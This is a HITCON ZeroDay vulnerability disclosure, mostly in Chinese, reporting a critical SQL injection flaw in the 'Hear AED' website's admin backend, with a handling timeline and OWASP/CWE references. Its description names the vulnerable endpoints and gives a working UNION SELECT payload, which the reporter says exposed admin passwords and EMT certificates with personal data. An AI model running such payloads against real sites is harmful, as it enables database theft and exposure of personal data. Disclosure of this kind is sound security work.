聽見 AED 資料庫注入漏洞

Vulnerability Overview

ZDID: ZD-2025-00230
發信 Vendor: 社團法人臺灣愛陌生安全推廣協會
Title: 聽見 AED 資料庫注入漏洞
Introduction: SQL Injection

處理狀態

目前狀態

公開

Last Update : 2025/04/28

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2025/03/12 22:29:08 : 新提交 (由 Yuki 更新此狀態)
2025/03/13 17:53:34 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/03/21 16:24:43 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/03/21 16:24:43 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/03/21 16:24:43 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/03/24 14:39:04 : 修補中 (由組織帳號更新此狀態)
2025/04/10 12:37:12 : 複測申請中 (由組織帳號更新此狀態)
2025/04/28 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-00230
通報者：kaikai0318 (Yuki)
風險：嚴重
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

https://hear-aed.com.tw/backadmin/login
https://hear-aed.com.tw/backadmin/api/file?id=
以上使用 ' -- 的 SQL injection 測試都會帶出報錯資訊，表示注入攻擊可能性非常高

使用 SQLMAP 找出 db name: Hear_AED_backadmin，由於此網站比較特別，SQLMAP 無法直接獲取所有資料，於是手動構造 Payload 注入攻擊

Payload: https://hear-aed.com.tw/backadmin/api/file?id=1' AND 1=0 UNION SELECT 'a', GROUP_CONCAT(column_name SEPARATOR ','), 'c','d','e' FROM information_schema.columns WHERE table_name = 'backadminList' UNION SELECT * FROM fileList WHERE id = '1
可以列出所有 column_name，並進一步取得後台登入密碼與所有救護技術員證書(含機敏個資)

共同漏洞發掘者:
IceOrange
HITCON ZD: https://zeroday.hitcon.org/user/Arnold1029
Github: https://github.com/hexSophia